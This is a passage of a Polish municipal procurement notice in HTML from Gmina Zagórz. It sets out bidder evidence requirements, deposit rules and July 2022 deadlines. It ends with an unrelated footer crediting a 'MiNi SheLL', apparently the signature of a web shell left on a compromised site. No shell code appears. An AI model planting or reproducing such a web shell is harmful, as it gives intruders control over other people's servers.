dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ;<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p. w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 3-6 p.z.p. oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust. 1 pkt 5, 7 p.z.p. oraz w zakresie odnoszącym się do podstaw wykluczania wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa (Dz. U. poz. 235 z 2022r.) - wzór oświadczenia stanowi Załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert zgodnie ze wzorem stanowiącym – na potwierdzenie spełniania warunków udziału w postępowaniu określonych w rozdz. VIII ust, 2 pkt 4 lit. a SWZ. Wzór wykazu usług stanowi załącznik nr 5 do SWZ;<br/>4)	wykaz osób skierowanych przez wykonawcę do realizacji zmówienia publicznego odpowiedzialnych za wykonanie projektu budowlanego, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonanych przez nie czynności oraz informację i podstawie do dysponowania tymi osobami – na potwierdzenie spełniania warunków udziału w postępowaniu określonych w rozdz. VIII ust. 2 pkt 4 lit. b SWZ. Wzór wykazu osób stanowi załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>1)	Dla części nr. 1: 5 000,00 zł (słownie: pięć tysięcy 00/100 złotych);<br/>2)	Dla części nr. 2: 500,00 zł (słownie: pięćset 00/100 złotych);<br/>3)	Dla części nr. 3: 6 000,00 zł (słownie: sześć tysięcy 00/100 złotych);<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku PEKAO S.A. I Oddział Sanok, nr rachunku: 47 1240 2340 1111 0010 4389 6489 z dopiskiem &#34;Wadium – PZP.271.16.2022&#34;.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p. <br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Gmina Zagórz<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium zostanie odrzucona <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w<br/>Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Zgodnie z art. 117 ust. 4 p.z.p. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr<br/>10 do SWZ. Oświadczenie przekazuje się w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>elektronicznym podpisem zaufanym lub podpisem osobistym przez Wykonawcę lub jako cyfrowe odwzorowanie<br/>dokumentu, który został sporządzony w postaci papierowej i opatrzony własnoręcznym podpisem potwierdzające zgodność odwzorowania cyfrowego z dokumentem w postaci papierowej; cyfrowe odwzorowanie dokumentu (elektroniczna kopia<br/>dokumentu, który został sporządzony w postaci papierowej i opatrzony własnoręcznym podpisem) jest opatrywane<br/>kwalifikowanym podpisem elektronicznym lub elektronicznym podpisem zaufanym lub podpisem osobistym przez<br/>Wykonawcę lub przez notariusza.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 p.z.p. oraz wskazanym w projektowanych postanowieniach umowy w sprawie zamówienia<br/>publicznego, stanowiącym Załącznik nr 6 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-01 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-30</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com